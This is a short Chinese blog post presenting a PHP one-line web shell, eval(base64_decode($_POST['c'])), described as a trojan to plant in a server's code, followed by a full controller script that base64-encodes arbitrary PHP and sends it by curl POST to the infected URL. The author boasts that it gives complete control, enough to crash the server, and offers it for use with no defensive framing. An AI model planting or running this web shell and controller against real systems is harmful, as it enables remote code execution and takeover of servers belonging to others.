php 超级入侵一句话木马

  我也是偶然间才知道!超级牛逼的一句话木马,可以完完全全执行php代码,这要把这段代码加到程序上面,危害性都是你控制的,让服务器崩溃都可以,我也是偶尔间看到一篇文章的,

 原理就是 eval 可以把字符串变成可执行代码,get方式提交的话,由于浏览器问题所以有的代码不能执行,并且也有限制数据的大小,post提交,就用考虑到编码问题,而且提交的数据也比get大,下面是代码

 植入的php病毒木马

 eval(base64_decode($_POST[‘c’]));

 超控木马的代码

<?php 
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = '$fp=fopen("1ddsa.txt","w+");
fputs($fp,"dsadas");
fclose($fp);';
$code = base64_encode($code);
$url = '被植入木马的链接';
echo request_post($url,array("c"=>$code));

function request_post($url = '', $post_data = array()) {
        if (empty($url) || empty($post_data)) {
            return false;
        }
        
        $o = "";
        foreach ( $post_data as $k => $v ) 
        { 
            $o.= "$k=" . urlencode( $v ). "&" ;
        }
        $post_data = substr($o,0,-1);

        $postUrl = $url;
        $curlPost = $post_data;
        $ch = curl_init();//初始化curl
        curl_setopt($ch, CURLOPT_URL,$postUrl);//抓取指定网页
        curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
        curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
        curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
        $data = curl_exec($ch);//运行curl
        curl_close($ch);
        
        return $data;
    }
?>

发表评论

电子邮件地址不会被公开。 必填项已用*标注